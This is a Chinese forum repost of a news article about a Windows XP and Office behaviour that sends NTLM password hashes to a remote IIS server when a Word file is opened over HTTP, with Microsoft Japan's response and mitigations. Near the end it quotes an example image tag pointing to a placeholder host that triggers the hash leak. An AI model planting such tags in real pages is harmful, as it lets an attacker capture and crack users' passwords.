- 在线时间
- 0 小时
- 最后登录
- 2007-9-23
- 注册时间
- 2004-9-10
- 听众数
- 3
- 收听数
- 0
- 能力
- 0 分
- 体力
- 9975 点
- 威望
- 7 点
- 阅读权限
- 150
- 积分
- 4048
- 相册
- 0
- 日志
- 0
- 记录
- 0
- 帖子
- 1893
- 主题
- 823
- 精华
- 2
- 分享
- 0
- 好友
- 0

我的地盘我做主
该用户从未签到
 |
|
Windows XP发现在用户不知情的情况下向外部服务器发送密码的潜在危险。该危险是由网络管理工具供应商Security Friday发现后报告给与安全相关的邮件清单“NTBugtraq”的。其“具有向恶意用户泄漏密码的潜在危险。” # O, X5 L6 U# X* v2 ^4 C1 `
& U: I2 X8 R# H0 y) d) \4 h# g( t* s4 n- [$ R9 V+ Z
该公司发现这一危险的关表示,该潜在危险与安装Office 2000/XP/2003的Windows XP电脑和将文件共享设为有效的Windows Server的IIS(Internet Infomation Services)有关,当用户在Windows XP电脑连接HTTP后直接打开在IIS上公开的Word文件(扩展名为Doc)时,Windows XP电脑便试图对该Windows Server进行NTLM认证。
) U; Z2 q; H4 S# c) n
: n0 v6 f; M6 v" I* s( E# @
7 I1 N; s, G( A6 X( T4 [ 当执行NTLM认证时,客户端便会向服务器发送经过hush处理的密码。关表示,“如果针对恶意用户建立的服务器进行NTLM认证,那么只需几分钟便可破解hush处理过的密码”。也就是说,只要用户直接打开恶意用户公开的Doc文件便会使用户的密码被盗。 9 |4 Y" O- I+ Q0 @7 e" c4 Y& R
6 d; A5 e1 T# s- G0 N# y
, V, H$ P7 l( B8 a) w* P
记者曾经向日本微软的安全反应团队对该潜在危险进行咨询,得到的答复是这是正常规格而不是软件错误。当在安装Office 2000/XP/2003的Windows电脑上用Internet Explorer打开诸如“服务器为IIS" target=_blank>http://www.xxx.yyy/test/zzz.doc”链接时(Web服务器为IIS),可以用客户端的Word直接打开Doc文件。此时Word和Windows XP试图在[我的电脑]中添加快捷键以保存Doc文件的服务器的信息。当在Windows XP中连接文件服务器后,为了下次更快捷连接该服务器,将在[我的电脑]上生成快捷键。而在Word打开IIS上的Doc文件时,也会执行同样的动作,此时试图对服务器进行NTLM认证。 9 r5 I9 D) t9 ]
1 y3 z! ^! l/ i' O5 q/ {, e
) L0 ^4 l V* Q1 z! o 日本微软的安全反应团队表示:“我们已经确认Windows XP和Word中存在上述规格。从安全角度来讲,无论用户出于什么目的,使用UNC(通用命名规则)连接外部网站都不是值得提倡的事情。目前没有发布软件补丁的计划,但今后有可能根据情况做出改变。” ! n% H: U2 |3 O- b% g: D5 k
' g* v) q) c4 G% [( E3 _9 s* g; Q/ }3 v9 E$ i p! N
日本微软表示,只要按照微软的支持技术信息242578中的“ [我的网络]中不添加网络共享快捷键的方法”对Windows XP进行设置,便可使Windows XP的该规格无效。而关则表示,即使进行上述设置也无法阻止发送密码。事实上只要将操作系统的服务“Web客户端服务”设为停止使用就无法发送密码。 # ~8 W4 h5 G& E Q" }2 t7 l' \
/ z, s: c, c% U9 {
, b! J' f* l/ Z0 _ 关表示,在此之前Windows中曾多次发现类似“在用户不知情的情况下发送密码”的规格。例如,由于可能导致安全漏洞,微软曾针对“Windows 2000的Telnet客户端擅自发送密码的规格”和“Windows 2000/Me的Web Extender客户端擅自发送密码的规格”发布补丁模块。但对于此次发现的与Word相关的规格和当浏览含有“<img src=file://\\www.xxx.yyy\test>”图片标识的HTML文件时向服务器发送密码的规格则没有发布补丁。9 [$ N6 `: B1 z
' l, V4 S. M6 G
|
zan
|